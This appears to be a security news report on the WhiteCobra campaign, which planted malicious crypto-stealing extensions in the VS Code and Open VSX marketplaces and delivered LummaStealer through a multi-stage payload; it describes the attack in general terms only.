A threat actor named WhiteCobra has infiltrated the Visual Studio Code marketplace and Open VSX registry with 24 malicious extensions targeting developers using VSCode, Cursor, and Windsurf editors .
Campaign overview
The ongoing campaign represents a sophisticated operation that researchers at Koi Security have been tracking for over a year. WhiteCobra is the same group responsible for a $500,000 cryptocurrency theft in July 2025, demonstrating their evolution from basic PowerShell miners to advanced crypto-stealing malware .
The campaign gained significant attention when Ethereum developer Zak Cole, a security professional with a decade of experience, had his wallet drained after installing what appeared to be a legitimate extension called "contractshark.solidity-lang" for the Cursor editor . The extension featured professional design elements, detailed descriptions, and showed 54,000 downloads on OpenVSX, highlighting the sophisticated deception techniques employed .
Attack methodology
WhiteCobra deployed extensions across both platforms, including names like ChainDevTools.solidity-pro, kilocode-ai.kilo-code, juan-blanco.solidity, and VitalikButerin-EthFoundation.blan-co on various marketplaces . These extensions specifically target cryptocurrency-related development tools, particularly Solidity smart contract development extensions .
The malicious extensions execute through a multi-stage payload delivery system. The main extension file appears identical to standard VSCode boilerplate code but contains a hidden call to a secondary script that downloads platform-specific payloads from Cloudflare Pages .
On Windows systems, the payload executes PowerShell scripts that deploy Python code containing shellcode to run LummaStealer malware.
This sophisticated info-stealer targets cryptocurrency wallets, browser credentials, web extensions, and messaging application data .
On macOS systems, the payload deploys a malicious Mach-O binary that loads an unknown malware family, demonstrating cross-platform capabilities .
Operational sophistication
WhiteCobra operates with remarkable organization and persistence. The group maintains detailed playbooks with revenue targets ranging from $10,000 to $500,000, provides command-and-control infrastructure setup guides, and employs sophisticated social engineering and marketing strategies to make their extensions appear legitimate .
The threat actors manipulate download counts, ratings, and reviews to establish credibility, making detection extremely difficult for users . When extensions are removed, WhiteCobra can deploy replacement campaigns in under three hours, demonstrating their resilience and operational efficiency .
Ongoing threat
Despite security researchers reporting and removing malicious extensions, WhiteCobra continues uploading new malicious code weekly, making this an active and persistent threat to the developer community . The campaign's success against experienced security professionals underscores the sophisticated nature of these attacks and the urgent need for improved verification mechanisms in extension marketplaces .
